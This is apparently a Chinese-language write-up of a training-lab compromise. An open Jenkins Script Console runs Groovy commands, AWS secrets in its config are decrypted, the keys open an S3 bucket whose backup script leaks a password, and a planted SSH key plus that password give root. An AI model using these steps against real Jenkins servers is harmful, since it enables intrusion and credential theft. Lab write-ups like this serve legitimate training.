目标

image-20251008164253140

nmap

1
2
3
4
5
6
7
8
9
10
──(kali㉿kali)-[~/Desktop]
└─$ nmap -p- -T4 10.1.20.120    
Nmap scan report for 10.1.20.120
Host is up (0.37s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 1776.62 seconds

8080端口运行了一个Jenkins

image-20251008164655006

Jenkins 没有开启认证服务

每当我看到这里 我就认为差不多就可以在这个Jenkins 服务器上面为所欲为了。

因为在Dashboard/Manage Jenkins/Script Console中你可以编写你自己的Groovy来进行命令执行

比如

1
2
3
4
def proc = "ls -la /".execute()
proc.in.eachLine { println it }
proc.err.eachLine { System.err.println it }
proc.waitFor()

image-20251008165600648

在通知中心中可以看到

image-20251008165804980

有着以明文配置的AWS secrets

然后转到Dashboard/Manage Jenkins/System

就能看到配置信息了

image-20251008170038080

AWSCLI上面配置好之后看桶中的内容

1
2
3
4
5
yliken@LAPTOP-40PQI58C:~$ aws s3 ls s3://jenkins-config-load --recursive --profile jenkins
2023-07-10 23:15:33          0 admin/
2024-02-10 05:13:57        115 admin/jenkins-backup.sh
2023-07-10 20:19:31       1111 config.xml
yliken@LAPTOP-40PQI58C:~$

但是没办法读取/admin/jenkins-backup.sh

1
2
3
yliken@LAPTOP-40PQI58C:~$ aws s3 cp s3://jenkins-config-load/admin/jenkins-backup.sh . --profile jenkins
fatal error: An error occurred (403) when calling the HeadObject operation: Forbidden
yliken@LAPTOP-40PQI58C:~$

Dashboard/Manage Jenkins/Credentials/System/Global credentials (unrestricted)中可以看到admin的AWS Credentials

image-20251008170517936

f12修改源码,就可以看到编码后的Secret Access Key

image-20251008170553296

可以在Script Console中利用println(hudson.util.Secret.decrypt("{<encrypted value>}"))来解开

image-20251008171007745

配置admin的认证文件之后就可以下载admin/jenkins-backup.sh

里面是一段shell脚本

1
2
3
4
5
6
7
yliken@LAPTOP-40PQI58C:~$ aws s3 cp s3://jenkins-config-load/admin/jenkins-backup.sh . --profile jenkins2
download: s3://jenkins-config-load/admin/jenkins-backup.sh to ./jenkins-backup.sh
yliken@LAPTOP-40PQI58C:~$ cat jenkins-backup.sh
#!/bin/bash

sshpass -p 'VHwecyhrecc3' -P passphrase scp -i dev.pem -r dev@52.203.31.30:/backups/jenkins /backups/
yliken@LAPTOP-40PQI58C:~$

然后转到Script Console

写入一个ssh公钥文件

image-20251008171307100

image-20251008172020006

然后使用ssh登录上去

然后使用在backup.sh中获取的密码就能提到root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
┌──(kali㉿kali)-[~/Desktop/pwnedlabs]
└─$ ssh jenkins@10.1.20.120 
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1028-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Oct  8 09:21:04 UTC 2025

  System load:  0.0               Processes:             97
  Usage of /:   47.5% of 7.57GB   Users logged in:       0
  Memory usage: 66%               IPv4 address for eth0: 10.1.20.120
  Swap usage:   0%

 * Ubuntu Pro delivers the most comprehensive open source security and
   compliance features.

   https://ubuntu.com/aws/pro

Expanded Security Maintenance for Applications is not enabled.

1 update can be applied immediately.
1 of these updates is a standard security update.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

jenkins@ip-10-1-20-120:~$ su -
Password: 
root@ip-10-1-20-120:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ip-10-1-20-120:~# ls
flag.txt  snap
root@ip-10-1-20-120:~#